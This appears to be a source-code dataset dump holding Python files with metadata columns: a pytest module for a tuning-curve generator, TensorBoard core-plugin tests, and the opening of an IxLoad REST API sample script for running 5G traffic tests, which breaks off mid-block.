return emit_tuning_curve_generator(**dict(TEST_PARAMS, **kwargs))
def tcg_for_test(config={}, **kwargs):
tcg, rest = consume_config(emit_tcg_for_test, config, **kwargs)
assert not rest
return tcg
def get_param_values(self):
values = {}
for p in self.get_all_params():
values[p.name] = p.get_value()
return values
@pytest.mark.parametrize('ssn_type, params', [
('default', {}),
# dict(J=0.5), # unsupported (should I?)
('default', dict(J=[[1, 2], [3, 4]])),
('default', dict(J=np.array([[1, 2], [3, 4]], dtype=int))),
('default', dict(J=np.array([[1, 2], [3, 4]], dtype='float32'))),
('heteroin', dict(V=[0.3, 0])),
('deg-heteroin', dict(V=0.5)),
])
def test_tcg_set_params(ssn_type, params):
config = dict(ssn_type=ssn_type)
tcg = tcg_for_test(config)
keys = set(params)
tcg.set_params(params)
assert keys == set(params) # set_params must not modify params
actual = get_param_values(tcg)
test = {}
for k in keys:
test[k] = np.allclose(actual[k], params[k])
# Manually compare parameters (instead of
# np.testing.assert_equal) since params[k] may be broadcast to
# array.
assert all(test.values())
def test_tcg_set_unknown_params():
tcg = tcg_for_test()
with pytest.raises(ValueError) as excinfo:
tcg.set_params(dict(V=[0.3, 0]))
assert 'Unknown parameters:' in str(excinfo.value)
flat_param_names = {
'default': [
'J_EE', 'J_EI',
'J_IE', 'J_II',
'D_EE', 'D_EI',
'D_IE', 'D_II',
'S_EE', 'S_EI',
'S_IE', 'S_II',
],
}
flat_param_names['heteroin'] = ['V_E', 'V_I'] + flat_param_names['default']
flat_param_names['deg-heteroin'] = ['V'] + flat_param_names['default']
@pytest.mark.parametrize('ssn_type', ssn_type_choices)
@pytest.mark.parametrize('conditional', [False, True])
def test_tcg_flat_param_names(ssn_type, conditional):
desired_names = tuple(flat_param_names[ssn_type])
config = {}
if conditional:
config['emit_tcg'] = ConditionalTuningCurveGenerator.consume_kwargs
tcg = tcg_for_test(config, ssn_type=ssn_type)
assert tcg.get_flat_param_names() == desired_names
| 27.409524 | 75 | 0.652884 | import numpy as np
import pytest
from ...core import consume_config
from ..cwgan import ConditionalTuningCurveGenerator
from ..ssn import emit_tuning_curve_generator, ssn_type_choices
from ..wgan import DEFAULT_PARAMS
from .test_euler_ssn import JDS
TEST_PARAMS = dict(
DEFAULT_PARAMS,
num_tcdom=10,
num_sites=50,
tau_E=2,
dt=0.1,
seqlen=240,
skip_steps=200,
probes=[0],
**JDS
)
del TEST_PARAMS['bandwidths']
del TEST_PARAMS['contrasts']
del TEST_PARAMS['sample_sites']
del TEST_PARAMS['gen']
del TEST_PARAMS['disc']
def emit_tcg_for_test(**kwargs):
return emit_tuning_curve_generator(**dict(TEST_PARAMS, **kwargs))
def tcg_for_test(config={}, **kwargs):
tcg, rest = consume_config(emit_tcg_for_test, config, **kwargs)
assert not rest
return tcg
def get_param_values(self):
values = {}
for p in self.get_all_params():
values[p.name] = p.get_value()
return values
@pytest.mark.parametrize('ssn_type, params', [
('default', {}),
[1, 2], [3, 4]])),
('default', dict(J=np.array([[1, 2], [3, 4]], dtype=int))),
('default', dict(J=np.array([[1, 2], [3, 4]], dtype='float32'))),
('heteroin', dict(V=[0.3, 0])),
('deg-heteroin', dict(V=0.5)),
])
def test_tcg_set_params(ssn_type, params):
config = dict(ssn_type=ssn_type)
tcg = tcg_for_test(config)
keys = set(params)
tcg.set_params(params)
assert keys == set(params)
actual = get_param_values(tcg)
test = {}
for k in keys:
test[k] = np.allclose(actual[k], params[k])
assert all(test.values())
def test_tcg_set_unknown_params():
tcg = tcg_for_test()
with pytest.raises(ValueError) as excinfo:
tcg.set_params(dict(V=[0.3, 0]))
assert 'Unknown parameters:' in str(excinfo.value)
flat_param_names = {
'default': [
'J_EE', 'J_EI',
'J_IE', 'J_II',
'D_EE', 'D_EI',
'D_IE', 'D_II',
'S_EE', 'S_EI',
'S_IE', 'S_II',
],
}
flat_param_names['heteroin'] = ['V_E', 'V_I'] + flat_param_names['default']
flat_param_names['deg-heteroin'] = ['V'] + flat_param_names['default']
@pytest.mark.parametrize('ssn_type', ssn_type_choices)
@pytest.mark.parametrize('conditional', [False, True])
def test_tcg_flat_param_names(ssn_type, conditional):
desired_names = tuple(flat_param_names[ssn_type])
config = {}
if conditional:
config['emit_tcg'] = ConditionalTuningCurveGenerator.consume_kwargs
tcg = tcg_for_test(config, ssn_type=ssn_type)
assert tcg.get_flat_param_names() == desired_names
| true | true |
f7231a116ed9f09ae68969561b1b23aa5374e682 | 14,609 | py | Python | tensorboard/plugins/core/core_plugin_test.py | manivaradarajan/tensorboard | c1c7cbd665b1da025f9b23adae8ba41d2890d424 | [
"Apache-2.0"
] | 1 | 2017-08-28T08:12:14.000Z | 2017-08-28T08:12:14.000Z | tensorboard/plugins/core/core_plugin_test.py | lanpa/tensorboard | 6ba7155a614cf1cfab97f8ec7c561adb0a609b0d | [
"Apache-2.0"
] | 16 | 2017-08-31T05:13:08.000Z | 2020-07-09T03:22:14.000Z | tensorboard/plugins/core/core_plugin_test.py | lanpa/tensorboard | 6ba7155a614cf1cfab97f8ec7c561adb0a609b0d | [
"Apache-2.0"
] | 1 | 2020-08-03T20:21:35.000Z | 2020-08-03T20:21:35.000Z | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests the TensorBoard core endpoints."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections.abc
import contextlib
import json
import os
import six
import zipfile
try:
# python version >= 3.3
from unittest import mock
except ImportError:
import mock # pylint: disable=unused-import
import tensorflow as tf
from werkzeug import test as werkzeug_test
from werkzeug import wrappers
from tensorboard.backend import application
from tensorboard.backend.event_processing import (
plugin_event_multiplexer as event_multiplexer,
)
from tensorboard.data import provider
from tensorboard.plugins import base_plugin
from tensorboard.plugins.core import core_plugin
from tensorboard.util import test_util
FAKE_INDEX_HTML = b"<!doctype html><title>fake-index</title>"
class FakeFlags(object):
def __init__(
self,
bind_all=False,
host=None,
inspect=False,
version_tb=False,
logdir="",
logdir_spec="",
event_file="",
db="",
path_prefix="",
generic_data="true",
):
self.bind_all = bind_all
self.host = host
self.inspect = inspect
self.version_tb = version_tb
self.logdir = logdir
self.logdir_spec = logdir_spec
self.event_file = event_file
self.db = db
self.path_prefix = path_prefix
self.generic_data = generic_data
class CorePluginFlagsTest(tf.test.TestCase):
def testFlag(self):
loader = core_plugin.CorePluginLoader()
loader.fix_flags(FakeFlags(version_tb=True))
loader.fix_flags(FakeFlags(inspect=True, logdir="/tmp"))
loader.fix_flags(FakeFlags(inspect=True, event_file="/tmp/event.out"))
loader.fix_flags(FakeFlags(inspect=False, logdir="/tmp"))
loader.fix_flags(FakeFlags(inspect=False, db="sqlite:foo"))
# User can pass both, although the behavior is not clearly defined.
loader.fix_flags(
FakeFlags(inspect=False, logdir="/tmp", db="sqlite:foo")
)
logdir_or_db_req = r"A logdir or db must be specified"
one_of_event_or_logdir_req = (
r"Must specify either --logdir.*but not both.$"
)
event_or_logdir_req = r"Must specify either --logdir or --event_file.$"
with six.assertRaisesRegex(self, ValueError, event_or_logdir_req):
loader.fix_flags(FakeFlags(inspect=True))
with six.assertRaisesRegex(
self, ValueError, one_of_event_or_logdir_req
):
loader.fix_flags(
FakeFlags(
inspect=True, logdir="/tmp", event_file="/tmp/event.out"
)
)
with six.assertRaisesRegex(self, ValueError, logdir_or_db_req):
loader.fix_flags(FakeFlags(inspect=False))
with six.assertRaisesRegex(self, ValueError, logdir_or_db_req):
loader.fix_flags(
FakeFlags(inspect=False, event_file="/tmp/event.out")
)
def testPathPrefix_stripsTrailingSlashes(self):
loader = core_plugin.CorePluginLoader()
for path_prefix in ("/hello", "/hello/", "/hello//", "/hello///"):
flag = FakeFlags(
inspect=False, logdir="/tmp", path_prefix=path_prefix
)
loader.fix_flags(flag)
self.assertEqual(
flag.path_prefix,
"/hello",
"got %r (input %r)" % (flag.path_prefix, path_prefix),
)
def testPathPrefix_mustStartWithSlash(self):
loader = core_plugin.CorePluginLoader()
flag = FakeFlags(inspect=False, logdir="/tmp", path_prefix="noslash")
with self.assertRaises(base_plugin.FlagsError) as cm:
loader.fix_flags(flag)
msg = str(cm.exception)
self.assertIn("must start with slash", msg)
self.assertIn(repr("noslash"), msg)
class CorePluginNoDataTest(tf.test.TestCase):
def setUp(self):
super(CorePluginNoDataTest, self).setUp()
context = base_plugin.TBContext(
assets_zip_provider=get_test_assets_zip_provider(),
logdir=self.get_temp_dir(),
multiplexer=event_multiplexer.EventMultiplexer(),
window_title="title foo",
)
self.plugin = core_plugin.CorePlugin(context)
app = application.TensorBoardWSGI([self.plugin])
self.server = werkzeug_test.Client(app, wrappers.BaseResponse)
def _get_json(self, server, path):
response = server.get(path)
self.assertEqual(200, response.status_code)
self.assertEqual(
"application/json", response.headers.get("Content-Type")
)
return json.loads(response.get_data().decode("utf-8"))
def testRoutesProvided(self):
"""Tests that the plugin offers the correct routes."""
routes = self.plugin.get_plugin_apps()
self.assertIsInstance(routes["/data/logdir"], collections.abc.Callable)
self.assertIsInstance(routes["/data/runs"], collections.abc.Callable)
def testIndex_returnsActualHtml(self):
"""Test the format of the root / endpoint."""
response = self.server.get("/")
self.assertEqual(200, response.status_code)
self.assertStartsWith(response.headers.get("Content-Type"), "text/html")
html = response.get_data()
self.assertEqual(html, FAKE_INDEX_HTML)
def testDataPaths_disableAllCaching(self):
"""Test the format of the /data/runs endpoint."""
for path in ("/data/runs", "/data/logdir"):
response = self.server.get(path)
self.assertEqual(200, response.status_code, msg=path)
self.assertEqual("0", response.headers.get("Expires"), msg=path)
def testEnvironmentForWindowTitle(self):
"""Test that the environment route correctly returns the window
title."""
parsed_object = self._get_json(self.server, "/data/environment")
self.assertEqual(parsed_object["window_title"], "title foo")
def testEnvironmentForLogdir(self):
"""Test that the environment route correctly returns the logdir."""
parsed_object = self._get_json(self.server, "/data/environment")
self.assertEqual(parsed_object["data_location"], self.get_temp_dir())
def testLogdir(self):
"""Test the format of the data/logdir endpoint."""
parsed_object = self._get_json(self.server, "/data/logdir")
self.assertEqual(parsed_object, {"logdir": self.get_temp_dir()})
class CorePluginExperimentMetadataTest(tf.test.TestCase):
def _get_json(self, server, path):
response = server.get(path)
self.assertEqual(200, response.status_code)
self.assertEqual(
"application/json", response.headers.get("Content-Type")
)
return json.loads(response.get_data().decode("utf-8"))
def testGetEnvironmentDataWithExperimentMetadata(self):
"""Test environment route returns correct metadata about experiment."""
class FakeDataProvider(object):
def data_location(self, ctx, *, experiment_id):
del experiment_id # Unused.
return ""
def experiment_metadata(self, ctx, *, experiment_id):
del experiment_id # Unused.
return provider.ExperimentMetadata(
experiment_name="Experiment #5 (実験#5)",
experiment_description="Take five (😊)",
creation_time=1234.5,
)
self.context = base_plugin.TBContext(
flags=FakeFlags(generic_data="true"),
data_provider=FakeDataProvider(),
)
self.plugin = core_plugin.CorePlugin(self.context)
app = application.TensorBoardWSGI([self.plugin])
self.server = werkzeug_test.Client(app, wrappers.BaseResponse)
parsed_object = self._get_json(self.server, "/data/environment")
self.assertEqual(parsed_object["data_location"], "")
self.assertEqual(parsed_object["window_title"], None)
self.assertEqual(
parsed_object["experiment_name"], "Experiment #5 (実験#5)"
)
self.assertEqual(
parsed_object["experiment_description"], "Take five (😊)"
)
self.assertEqual(parsed_object["creation_time"], 1234.5)
def testGetEnvironmentDataWithNoExperimentMetadata(self):
"""Test environment route works when no experiment metadata exists."""
class FakeDataProvider(object):
def data_location(self, ctx, *, experiment_id):
del experiment_id # Unused.
return ""
def experiment_metadata(self, ctx, *, experiment_id):
del experiment_id # Unused.
return None
self.context = base_plugin.TBContext(
flags=FakeFlags(generic_data="true"),
data_provider=FakeDataProvider(),
)
self.plugin = core_plugin.CorePlugin(self.context)
app = application.TensorBoardWSGI([self.plugin])
self.server = werkzeug_test.Client(app, wrappers.BaseResponse)
parsed_object = self._get_json(self.server, "/data/environment")
self.assertEqual(parsed_object["data_location"], "")
self.assertEqual(parsed_object["window_title"], None)
self.assertNotIn("experiment_name", parsed_object)
self.assertNotIn("experiment_description", parsed_object)
self.assertNotIn("creation_time", parsed_object)
class CorePluginTestBase(object):
def setUp(self):
super(CorePluginTestBase, self).setUp()
self.logdir = self.get_temp_dir()
self.multiplexer = event_multiplexer.EventMultiplexer()
context = base_plugin.TBContext(
assets_zip_provider=get_test_assets_zip_provider(),
logdir=self.logdir,
multiplexer=self.multiplexer,
)
self.plugin = core_plugin.CorePlugin(context)
app = application.TensorBoardWSGI([self.plugin])
self.server = werkzeug_test.Client(app, wrappers.BaseResponse)
def create_multiplexer(self):
raise NotImplementedError()
def _add_run(self, run_name):
run_path = os.path.join(self.logdir, run_name)
with test_util.FileWriter(run_path) as writer:
writer.add_test_summary("foo")
self.multiplexer.AddRunsFromDirectory(self.logdir)
self.multiplexer.Reload()
def _get_json(self, server, path):
response = server.get(path)
self.assertEqual(200, response.status_code)
self.assertEqual(
"application/json", response.headers.get("Content-Type")
)
return json.loads(response.get_data().decode("utf-8"))
def testRuns(self):
"""Test the format of the /data/runs endpoint."""
self._add_run("run1")
run_json = self._get_json(self.server, "/data/runs")
self.assertEqual(run_json, ["run1"])
def testRunsAppendOnly(self):
"""Test that new runs appear after old ones in /data/runs."""
fake_wall_times = {
"run1": 1234.0,
"avocado": 2345.0,
"zebra": 3456.0,
"ox": 4567.0,
"mysterious": None,
"enigmatic": None,
}
def FirstEventTimestamp_stub(run_name):
matches = [
candidate_name
for candidate_name in fake_wall_times
if run_name.endswith(candidate_name)
]
self.assertEqual(len(matches), 1, "%s (%s)" % (matches, run_name))
wall_time = fake_wall_times[matches[0]]
if wall_time is None:
raise ValueError("No event timestamp could be found")
else:
return wall_time
with mock.patch.object(
self.multiplexer, "FirstEventTimestamp"
) as mock_first_event_timestamp:
mock_first_event_timestamp.side_effect = FirstEventTimestamp_stub
# Start with a single run.
self._add_run("run1")
# Add one run: it should come last.
self._add_run("avocado")
self.assertEqual(
self._get_json(self.server, "/data/runs"), ["run1", "avocado"],
)
# Add another run: it should come last, too.
self._add_run("zebra")
self.assertEqual(
self._get_json(self.server, "/data/runs"),
["run1", "avocado", "zebra"],
)
# And maybe there's a run for which we somehow have no timestamp.
self._add_run("mysterious")
self.assertEqual(
self._get_json(self.server, "/data/runs"),
["run1", "avocado", "zebra", "mysterious"],
)
# Add another timestamped run: it should come before the timestamp-less one.
self._add_run("ox")
self.assertEqual(
self._get_json(self.server, "/data/runs"),
["run1", "avocado", "zebra", "ox", "mysterious"],
)
# Add another timestamp-less run, lexicographically before the other one:
# it should come after all timestamped runs but first among timestamp-less.
self._add_run("enigmatic")
self.assertEqual(
self._get_json(self.server, "/data/runs"),
["run1", "avocado", "zebra", "ox", "enigmatic", "mysterious"],
)
def get_test_assets_zip_provider():
memfile = six.BytesIO()
with zipfile.ZipFile(
memfile, mode="w", compression=zipfile.ZIP_DEFLATED
) as zf:
zf.writestr("index.html", FAKE_INDEX_HTML)
return lambda: contextlib.closing(six.BytesIO(memfile.getvalue()))
if __name__ == "__main__":
tf.test.main()
| 37.945455 | 88 | 0.628517 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections.abc
import contextlib
import json
import os
import six
import zipfile
try:
from unittest import mock
except ImportError:
import mock
import tensorflow as tf
from werkzeug import test as werkzeug_test
from werkzeug import wrappers
from tensorboard.backend import application
from tensorboard.backend.event_processing import (
plugin_event_multiplexer as event_multiplexer,
)
from tensorboard.data import provider
from tensorboard.plugins import base_plugin
from tensorboard.plugins.core import core_plugin
from tensorboard.util import test_util
FAKE_INDEX_HTML = b"<!doctype html><title>fake-index</title>"
class FakeFlags(object):
def __init__(
self,
bind_all=False,
host=None,
inspect=False,
version_tb=False,
logdir="",
logdir_spec="",
event_file="",
db="",
path_prefix="",
generic_data="true",
):
self.bind_all = bind_all
self.host = host
self.inspect = inspect
self.version_tb = version_tb
self.logdir = logdir
self.logdir_spec = logdir_spec
self.event_file = event_file
self.db = db
self.path_prefix = path_prefix
self.generic_data = generic_data
class CorePluginFlagsTest(tf.test.TestCase):
def testFlag(self):
loader = core_plugin.CorePluginLoader()
loader.fix_flags(FakeFlags(version_tb=True))
loader.fix_flags(FakeFlags(inspect=True, logdir="/tmp"))
loader.fix_flags(FakeFlags(inspect=True, event_file="/tmp/event.out"))
loader.fix_flags(FakeFlags(inspect=False, logdir="/tmp"))
loader.fix_flags(FakeFlags(inspect=False, db="sqlite:foo"))
loader.fix_flags(
FakeFlags(inspect=False, logdir="/tmp", db="sqlite:foo")
)
logdir_or_db_req = r"A logdir or db must be specified"
one_of_event_or_logdir_req = (
r"Must specify either --logdir.*but not both.$"
)
event_or_logdir_req = r"Must specify either --logdir or --event_file.$"
with six.assertRaisesRegex(self, ValueError, event_or_logdir_req):
loader.fix_flags(FakeFlags(inspect=True))
with six.assertRaisesRegex(
self, ValueError, one_of_event_or_logdir_req
):
loader.fix_flags(
FakeFlags(
inspect=True, logdir="/tmp", event_file="/tmp/event.out"
)
)
with six.assertRaisesRegex(self, ValueError, logdir_or_db_req):
loader.fix_flags(FakeFlags(inspect=False))
with six.assertRaisesRegex(self, ValueError, logdir_or_db_req):
loader.fix_flags(
FakeFlags(inspect=False, event_file="/tmp/event.out")
)
def testPathPrefix_stripsTrailingSlashes(self):
loader = core_plugin.CorePluginLoader()
for path_prefix in ("/hello", "/hello/", "/hello//", "/hello///"):
flag = FakeFlags(
inspect=False, logdir="/tmp", path_prefix=path_prefix
)
loader.fix_flags(flag)
self.assertEqual(
flag.path_prefix,
"/hello",
"got %r (input %r)" % (flag.path_prefix, path_prefix),
)
def testPathPrefix_mustStartWithSlash(self):
loader = core_plugin.CorePluginLoader()
flag = FakeFlags(inspect=False, logdir="/tmp", path_prefix="noslash")
with self.assertRaises(base_plugin.FlagsError) as cm:
loader.fix_flags(flag)
msg = str(cm.exception)
self.assertIn("must start with slash", msg)
self.assertIn(repr("noslash"), msg)
class CorePluginNoDataTest(tf.test.TestCase):
def setUp(self):
super(CorePluginNoDataTest, self).setUp()
context = base_plugin.TBContext(
assets_zip_provider=get_test_assets_zip_provider(),
logdir=self.get_temp_dir(),
multiplexer=event_multiplexer.EventMultiplexer(),
window_title="title foo",
)
self.plugin = core_plugin.CorePlugin(context)
app = application.TensorBoardWSGI([self.plugin])
self.server = werkzeug_test.Client(app, wrappers.BaseResponse)
def _get_json(self, server, path):
response = server.get(path)
self.assertEqual(200, response.status_code)
self.assertEqual(
"application/json", response.headers.get("Content-Type")
)
return json.loads(response.get_data().decode("utf-8"))
def testRoutesProvided(self):
routes = self.plugin.get_plugin_apps()
self.assertIsInstance(routes["/data/logdir"], collections.abc.Callable)
self.assertIsInstance(routes["/data/runs"], collections.abc.Callable)
def testIndex_returnsActualHtml(self):
response = self.server.get("/")
self.assertEqual(200, response.status_code)
self.assertStartsWith(response.headers.get("Content-Type"), "text/html")
html = response.get_data()
self.assertEqual(html, FAKE_INDEX_HTML)
def testDataPaths_disableAllCaching(self):
for path in ("/data/runs", "/data/logdir"):
response = self.server.get(path)
self.assertEqual(200, response.status_code, msg=path)
self.assertEqual("0", response.headers.get("Expires"), msg=path)
def testEnvironmentForWindowTitle(self):
parsed_object = self._get_json(self.server, "/data/environment")
self.assertEqual(parsed_object["window_title"], "title foo")
def testEnvironmentForLogdir(self):
parsed_object = self._get_json(self.server, "/data/environment")
self.assertEqual(parsed_object["data_location"], self.get_temp_dir())
def testLogdir(self):
parsed_object = self._get_json(self.server, "/data/logdir")
self.assertEqual(parsed_object, {"logdir": self.get_temp_dir()})
class CorePluginExperimentMetadataTest(tf.test.TestCase):
def _get_json(self, server, path):
response = server.get(path)
self.assertEqual(200, response.status_code)
self.assertEqual(
"application/json", response.headers.get("Content-Type")
)
return json.loads(response.get_data().decode("utf-8"))
def testGetEnvironmentDataWithExperimentMetadata(self):
class FakeDataProvider(object):
def data_location(self, ctx, *, experiment_id):
del experiment_id
return ""
def experiment_metadata(self, ctx, *, experiment_id):
del experiment_id
return provider.ExperimentMetadata(
experiment_name="Experiment #5 (実験#5)",
experiment_description="Take five (😊)",
creation_time=1234.5,
)
self.context = base_plugin.TBContext(
flags=FakeFlags(generic_data="true"),
data_provider=FakeDataProvider(),
)
self.plugin = core_plugin.CorePlugin(self.context)
app = application.TensorBoardWSGI([self.plugin])
self.server = werkzeug_test.Client(app, wrappers.BaseResponse)
parsed_object = self._get_json(self.server, "/data/environment")
self.assertEqual(parsed_object["data_location"], "")
self.assertEqual(parsed_object["window_title"], None)
self.assertEqual(
parsed_object["experiment_name"], "Experiment #5 (実験#5)"
)
self.assertEqual(
parsed_object["experiment_description"], "Take five (😊)"
)
self.assertEqual(parsed_object["creation_time"], 1234.5)
def testGetEnvironmentDataWithNoExperimentMetadata(self):
class FakeDataProvider(object):
def data_location(self, ctx, *, experiment_id):
del experiment_id
return ""
def experiment_metadata(self, ctx, *, experiment_id):
del experiment_id
return None
self.context = base_plugin.TBContext(
flags=FakeFlags(generic_data="true"),
data_provider=FakeDataProvider(),
)
self.plugin = core_plugin.CorePlugin(self.context)
app = application.TensorBoardWSGI([self.plugin])
self.server = werkzeug_test.Client(app, wrappers.BaseResponse)
parsed_object = self._get_json(self.server, "/data/environment")
self.assertEqual(parsed_object["data_location"], "")
self.assertEqual(parsed_object["window_title"], None)
self.assertNotIn("experiment_name", parsed_object)
self.assertNotIn("experiment_description", parsed_object)
self.assertNotIn("creation_time", parsed_object)
class CorePluginTestBase(object):
def setUp(self):
super(CorePluginTestBase, self).setUp()
self.logdir = self.get_temp_dir()
self.multiplexer = event_multiplexer.EventMultiplexer()
context = base_plugin.TBContext(
assets_zip_provider=get_test_assets_zip_provider(),
logdir=self.logdir,
multiplexer=self.multiplexer,
)
self.plugin = core_plugin.CorePlugin(context)
app = application.TensorBoardWSGI([self.plugin])
self.server = werkzeug_test.Client(app, wrappers.BaseResponse)
def create_multiplexer(self):
raise NotImplementedError()
def _add_run(self, run_name):
run_path = os.path.join(self.logdir, run_name)
with test_util.FileWriter(run_path) as writer:
writer.add_test_summary("foo")
self.multiplexer.AddRunsFromDirectory(self.logdir)
self.multiplexer.Reload()
def _get_json(self, server, path):
response = server.get(path)
self.assertEqual(200, response.status_code)
self.assertEqual(
"application/json", response.headers.get("Content-Type")
)
return json.loads(response.get_data().decode("utf-8"))
def testRuns(self):
self._add_run("run1")
run_json = self._get_json(self.server, "/data/runs")
self.assertEqual(run_json, ["run1"])
def testRunsAppendOnly(self):
fake_wall_times = {
"run1": 1234.0,
"avocado": 2345.0,
"zebra": 3456.0,
"ox": 4567.0,
"mysterious": None,
"enigmatic": None,
}
def FirstEventTimestamp_stub(run_name):
matches = [
candidate_name
for candidate_name in fake_wall_times
if run_name.endswith(candidate_name)
]
self.assertEqual(len(matches), 1, "%s (%s)" % (matches, run_name))
wall_time = fake_wall_times[matches[0]]
if wall_time is None:
raise ValueError("No event timestamp could be found")
else:
return wall_time
with mock.patch.object(
self.multiplexer, "FirstEventTimestamp"
) as mock_first_event_timestamp:
mock_first_event_timestamp.side_effect = FirstEventTimestamp_stub
self._add_run("run1")
self._add_run("avocado")
self.assertEqual(
self._get_json(self.server, "/data/runs"), ["run1", "avocado"],
)
self._add_run("zebra")
self.assertEqual(
self._get_json(self.server, "/data/runs"),
["run1", "avocado", "zebra"],
)
self._add_run("mysterious")
self.assertEqual(
self._get_json(self.server, "/data/runs"),
["run1", "avocado", "zebra", "mysterious"],
)
# Add another timestamped run: it should come before the timestamp-less one.
self._add_run("ox")
self.assertEqual(
self._get_json(self.server, "/data/runs"),
["run1", "avocado", "zebra", "ox", "mysterious"],
)
# Add another timestamp-less run, lexicographically before the other one:
# it should come after all timestamped runs but first among timestamp-less.
self._add_run("enigmatic")
self.assertEqual(
self._get_json(self.server, "/data/runs"),
["run1", "avocado", "zebra", "ox", "enigmatic", "mysterious"],
)
def get_test_assets_zip_provider():
memfile = six.BytesIO()
with zipfile.ZipFile(
memfile, mode="w", compression=zipfile.ZIP_DEFLATED
) as zf:
zf.writestr("index.html", FAKE_INDEX_HTML)
return lambda: contextlib.closing(six.BytesIO(memfile.getvalue()))
if __name__ == "__main__":
tf.test.main()
| true | true |
f7231aa7882c5a7b70caf14173f985b835db854c | 6,685 | py | Python | RestApi/Python/SampleScripts/LoadSavedConfigFile/LoadConfigFileEvalStats_5G.py | karmoham/IxLoad | f8076796fee04b13fc672fb58ad4ed956db5d0d6 | [
"MIT"
] | 10 | 2018-03-01T11:41:01.000Z | 2022-02-22T18:05:34.000Z | RestApi/Python/SampleScripts/LoadSavedConfigFile/LoadConfigFileEvalStats_5G.py | karmoham/IxLoad | f8076796fee04b13fc672fb58ad4ed956db5d0d6 | [
"MIT"
] | 5 | 2018-11-02T07:46:51.000Z | 2021-05-24T16:30:29.000Z | RestApi/Python/SampleScripts/LoadSavedConfigFile/LoadConfigFileEvalStats_5G.py | karmoham/IxLoad | f8076796fee04b13fc672fb58ad4ed956db5d0d6 | [
"MIT"
] | 12 | 2018-05-08T19:38:57.000Z | 2022-02-01T19:14:51.000Z | # Description
# A sample Python REST API script to:
# - Load a saved configuration file
# - Run traffic
# - Get stats and evaluate for user defined expected stat values.
# - Get test result
#
# - For IxLoad Gateway running in Windows only. Linux Gateway is not supported at this time.
# - This script will set the license model to "Perpetual Mode". This is a 5G requirement.
#
# If the saved config file is located on a remote pc, this script could upload it to the gateway.
# Otherwise, the saved config file must be already in the IxLoad API gateway server.
#
# Requirements
# IxL_RestApi.py
# Air Mosaic installed in the Windows OS where IxLoad is installed
# The Air Mosaic version must be the same version as IxLoad for compatibility
# 5G cell
import os, sys, time, signal, traceback, platform
# Insert the Modules path to env in order to import IxL_RestApi.py
currentDir = os.path.abspath(os.path.dirname(__file__))
# Automatically create the os path to the IxL_RestApi.py module for this script to use
if platform.system() == 'Windows':
sys.path.insert(0, (currentDir.replace('SampleScripts\\LoadSavedConfigFile', 'Modules')))
else:
sys.path.insert(0, (currentDir.replace('SampleScripts/LoadSavedConfigFile', 'Modules')))
from IxL_RestApi import *
# Choices of IxLoad Gateway server OS: linux or windows
serverOs = 'windows'
# Which IxLoad version are you using for your test?
# To view all the installed versions, go on a web browser and enter:
# http://<server ip>:8080/api/v0/applicationTypes
ixLoadVersion = '9.10.115.43' ;# EA
# Do you want to delete the session at the end of the test or if the test failed?
deleteSession = True
forceTakePortOwnership = True
# API-Key: Use your user API-Key if you want added security
apiKey = None
# The saved config file to load
rxfFile = '5G-eLSU_HTTP_UXM_stats.rxf'
if serverOs == 'windows':
apiServerIp = '192.168.129.6'
# Where to store all of the csv result files in Windows
resultsDir = 'c:\\Results'
# Where to upload the config file or where to tell IxLoad the location if you're not uploading it.
rxfFileOnServer = 'C:\\Results\\{}'.format(rxfFile)
# Where to put the downloaded csv results
saveResultsInPath = currentDir
# Do you need to upload your saved config file to the server?
# If not, a saved config must be already in the IxLoad gateway server filesystem.
upLoadFile = True
# On the local host where you are running this script.
# The path to the saved config file. In this example, get it from the current folder.
if platform.system() == 'Linux':
localConfigFileToUpload = '{}/{}'.format(currentDir, rxfFile)
else:
localConfigFileToUpload = '{}\\{}'.format(currentDir, rxfFile)
# The path where you want to download the csv result files to. This is mostly used if using a Linux Gateway server.
# If you're using IxLoad in Windows, SSH must be installed. Otherwise, this variable will be ignored.
scpDestPath = currentDir
# For IxLoad versions prior to 8.50 that doesn't have the rest api to download results.
# Set to True if you want to save run time stat results to CSV files.
saveStatsToCsvFile = True
apiServerIpPort = 8443 ;# http=8080. https=8443 (https is supported starting 8.50)
licenseServerIp = '192.168.129.6'
# For 5G, the license model must be Perpetual Mode
licenseModel = 'Perpetual Mode'
# To assign ports for testing. Format = (cardId,portId)
# Traffic1@Network1 are activity names.
# To get the Activity names, got to: /ixload/test/activeTest/communityList
communityPortList1 = {
'chassisIp': '192.168.129.15',
'Traffic2@Network1': [(1,1)],
}
communityPortList2 = {
'chassisIp': '192.168.129.15',
'Traffic1@SGi': [(1,2)],
}
# Stat names to display at run time.
# To see how to get the stat names, go to the link below for step-by-step guidance:
# https://www.openixia.com/tutorials?subject=ixLoad/getStatName&page=fromApiBrowserForRestApi.html
#
# What this does:
# Get run time stats and evaluate the stats with an operator and the expected value.
# Due to stats going through ramp up and ramp down, stats will fluctuate.
# Once the stat hits and maintains the expected threshold value, the stat is marked as passed.
#
# If evaluating stats at run time is not what you need, use PollStats() instead shown
# in sample script LoadConfigFile.py
#
# operator options: None, >, <, <=, >=
statsDict = {
'HTTPClient': [{'caption': 'Rx Rate (Kbps)', 'operator': '>', 'expect': 5000000}]
}
#NRstatsDict = {
# 'UESIM-NRLayer1Statistics': [{'caption': "CRC OK TBs - PDSCH", 'operator': '>', 'expect': 1000)}]
#}
try:
restObj = Main(apiServerIp=apiServerIp,
apiServerIpPort=apiServerIpPort,
osPlatform=serverOs,
deleteSession=deleteSession,
pollStatusInterval=1,
apiKey=apiKey,
generateRestLogFile=True)
# sessionId is an opened existing session that you like to connect to instead of starting a new session.
restObj.connect(ixLoadVersion, sessionId=None, timeout=120)
restObj.configLicensePreferences(licenseServerIp=licenseServerIp, licenseModel=licenseModel)
restObj.setResultDir(resultsDir, createTimestampFolder=True)
if upLoadFile == True:
restObj.uploadFile(localConfigFileToUpload, rxfFileOnServer)
restObj.loadConfigFile(rxfFileOnServer)
restObj.assignChassisAndPorts([communityPortList1, communityPortList2])
if forceTakePortOwnership:
